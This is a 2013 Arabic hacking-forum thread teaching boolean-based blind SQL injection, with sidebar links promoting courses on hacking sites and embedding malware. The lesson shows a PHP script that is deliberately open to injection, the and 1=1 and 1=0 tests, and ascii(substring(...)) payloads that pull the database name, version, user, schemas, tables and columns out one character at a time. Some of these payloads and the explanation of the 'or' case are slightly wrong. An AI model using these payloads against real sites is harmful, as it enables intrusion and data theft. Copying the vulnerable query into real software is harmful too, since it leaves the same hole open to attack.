1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ درس ] boolean-based blind sql injection

الموضوع في '[ SQL-injection ]' بواسطة ŦђĘ βě$Ţ, بتاريخ ‏3 يونيو 2013.

كاتب الموضوع : ŦђĘ βě$Ţ المشاهدات : 1,676 الردود : 2 ‏3 يونيو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    ŦђĘ βě$Ţ
    Developer

    عضو منذ:
    ‏4 مارس 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    [​IMG]




    boolean-based blind sql injection


    نوع من انواع ثغرات سكيول


    مثال:


    كود PHP:
    <?php
    mysql_connect
    ('localhost','user','pass');
    mysql_select_db('sql_test');

    $reponse=mysql_query("select * from dz where `nom` like '%".$_GET['sql']."%' ");
    if(!
    mysql_num_rows($reponse)==0){
    echo 
    "dz";
    };

    ?>


    السكربت يتصل بقاعدة البيانات و تجلب النتيجة اذا وجدت يطبع


    dz


    كما نلاحظ


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    النتيجة


    كود:
    dz

    لو اضفنا and 1=1

    ******************************************
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    and 1=1

    (sql=1) ==>صحيح
    (1=1) ==>صحيح
    صحيح و صحيح يساوي صحيح
    اذن تطبع كلمة dz
    ******************************************
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    and 1=0

    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح و خطأيساوي خطأ
    اذن لا تطبع كلمة dz

    ********************************************

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    or 1=0



    (sql=1) ==>صحيح
    (0=1) ==>خطأ
    صحيح او خطأيساوي خطأ
    اذن تطبع كلمة dz


    ******************************************
    في المواقع
    تكون بملاحظة اختلاف بعد وضع سلاش / او '
    او اضافة استعلام خاطئ

    ننتقل الى المهم اوامر استخراج البيانات

    كود PHP:
    and ascii(substring (sql,1,1))=0
    substring
    هذا الاستعلام لتقسيم رد قاعدة البيانات
    substring (sql,x,y)
    x:الرتبة
    y:درجة التقسيم اذا كان 1 معناها وحدة وحدة
    ثم نشفر هذا الجزء بال ascii
    ثم المقاربة باستخدام
    = > <
    بستعمل الحصر لنجد الحرف بسرعة

    اذا تم طباعة dz كم في المثال معناها الاستعلام صحيح


    ******************************************
    استخراج اسم القاعدة

    كود PHP:
    and ascii(substring (database(),1,1))=0
    .
    .
    .
    .
    and substring (database(),1,1)=97 ==> صحيح


    اول حرف من القاعدة هو a
    ascii(a)=97
    اذا 97=97 ===> صحيح
    ننتقل الى الحرف الثاني
    كود PHP:
    and substring (database(),2,1)=0
    و هكذااااااااااااا

    ******************************************
    اصدار القاعدة

    كود PHP:
    and ascii(substring (version(),1,1))=0
    ******************************************
    اسم مستخدم القاعدة

    كود PHP:
    and ascii(substring (user(),1,1))=0
    ******************************************

    استخراج قواعد البيانات

    كود PHP:
    and ascii(substring ((select schema_name from information_schema.schemata),1,1))=0

    ******************************************
    استخراج اسماء الجداول
    كود PHP:
    and ascii(substring ((select table_name from information_schema.tables),1,1))=0
    ******************************************
    استخراج الاعمدة
    كود PHP:
    and ascii(substring ((select column_name from information_schema.columns),1,1))=0
    ******************************************

    تكمن استخدام جميع اوامر الشل سكيول
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    ريلاكس ياقلبي
    Active DeveloPer

    عضو منذ:
    ‏12 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: boolean-based blind sql injection

    يعطيك آلعـأفية يآ وحش
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...